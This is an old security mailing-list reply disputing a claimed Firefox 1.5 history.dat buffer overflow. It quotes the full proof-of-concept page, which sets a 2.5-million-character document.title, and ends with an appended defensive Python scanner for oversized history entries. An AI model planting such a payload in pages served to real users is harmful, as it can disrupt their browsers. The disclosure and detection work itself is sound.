Message-ID: <43983726.9060804@heapoverflow.com>
Date: Thu Dec  8 13:38:06 2005
From: ad at heapoverflow.com (ad@...poverflow.com)
Subject: re: Firefox 1.5 buffer overflow (poc)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Not a fake, nor do you really know what a buffer overflow is, but for
sure here on my Firefox 1.5 EN, the client takes much longer to load on
the next boot, but it reloads fine without exceptions, and there is
nothing about a security bug here...


><!-- Firefox 1.5 buffer overflow
>
>Basically Firefox logs all kinds of URL data in its history.dat file.
>This little script will set a really large topic and Firefox will then
>save that topic into its history.dat. The next time that Firefox is
>opened, it will instantly crash due to a buffer overflow -- this will
>happen every time until you manually delete the history.dat file, which
>most users won't figure out.
>
>This proof of concept will only prevent someone from reopening
>their browser after being exploited. DoS if you will. However, code
>execution is possible with some modifications.
>
>Tested with Firefox 1.5 on Windows XP SP2.
>
>ZIPLOCK <sickbeatz@...il.com>
>
>-->
><html><head><title>heh</title><script type="text/javascript">
>function ex() {
>	// Build a 5,000-character string of "A".
>	var buffer = "";
>	for (var i = 0; i < 5000; i++) {
>		buffer += "A";
>	}
>	// Append it to itself 500 more times: 501 * 5,000 = 2,505,000 characters.
>	var buffer2 = buffer;
>	for (var j = 0; j < 500; j++) {
>		buffer2 += buffer;
>	}
>	// The page title is what Firefox records in history.dat for this URL.
>	document.title = buffer2;
>}
></script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
></a></body></html>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
/Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
IFxjTMn8Sc0=
=SX09
-----END PGP SIGNATURE-----
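A triage check that follows from the thread above, added here as an editor's example and not code posted by either author: rather than deleting history.dat outright, scan it for the oversized title entry the PoC leaves behind. It assumes the Mork atom syntax `(id=value)`, with `\` escaping the next character and `$hh` encoding a hex byte (an assumption about the file format, not something the thread states; real Firefox titles are typically stored with `$00` escapes, which the decoder handles), and it runs on a constructed, not real, history.dat fragment carrying a title of exactly the size the PoC builds.

```python
import re
import sys
from typing import List, Tuple

# Assumed Mork atom syntax (history.dat is a Mork database): atoms are written
# "(id=value)", "\" escapes the next character and "$hh" is a hex-escaped byte.
# Row and table structure is ignored; only atom values are measured.
ATOM_RE = re.compile(rb"\(([0-9A-Fa-f]+)=((?:\\.|[^)\\])*)\)", re.DOTALL)

HEX_DIGITS = b"0123456789abcdefABCDEF"


def decode_mork_value(raw: bytes) -> bytes:
    """Undo Mork escaping so the reported length is the real value length."""
    if b"\\" not in raw and b"$" not in raw:
        return bytes(raw)  # fast path: nothing to unescape
    out = bytearray()
    i, n = 0, len(raw)
    while i < n:
        b = raw[i]
        if b == 0x5C and i + 1 < n:  # "\x" -> x
            out.append(raw[i + 1])
            i += 2
        elif (b == 0x24 and i + 3 <= n
              and raw[i + 1] in HEX_DIGITS and raw[i + 2] in HEX_DIGITS):  # "$hh" -> byte
            out.append(int(raw[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(b)
            i += 1
    return bytes(out)


def find_oversized_atoms(data: bytes, threshold: int = 4096) -> List[Tuple[str, int]]:
    """Return (atom id, decoded length) for every atom longer than threshold, largest first."""
    hits = []
    for m in ATOM_RE.finditer(data):
        length = len(decode_mork_value(m.group(2)))
        if length > threshold:
            hits.append((m.group(1).decode("ascii"), length))
    hits.sort(key=lambda hit: hit[1], reverse=True)
    return hits


PAYLOAD_LEN = 5000 * 501  # what the PoC's two loops produce for document.title

# Constructed stand-in for a history.dat, not a real Firefox file: one ordinary
# entry plus one Name atom (id 88) carrying a PoC-sized title.
SAMPLE_HISTORY = (
    b'// <!-- <mdb:mork:z v="1.4"/> -->\n'
    b"< <(a=c)> (82=URL)(83=Name)>\n"
    b"<(86=http://example.com/)(87=Example \\) page)(88="
    + b"A" * PAYLOAD_LEN
    + b")>\n{1:^80 {(k^81:c)(s=9)} [1(^82^86)(^83^88)]}\n"
)


if __name__ == "__main__":
    # Usage: python scan_history.py [path/to/history.dat]; defaults to the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for atom_id, length in find_oversized_atoms(data):
        print(f"atom {atom_id}: {length} bytes after unescaping")
```

Run against a profile's history.dat with the default 4 KiB threshold and the single 2,505,000-byte atom stands out immediately; the atom id can then be traced to the row that references it (here `(^83^88)`, the Name cell), which is the entry to remove rather than the whole history.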
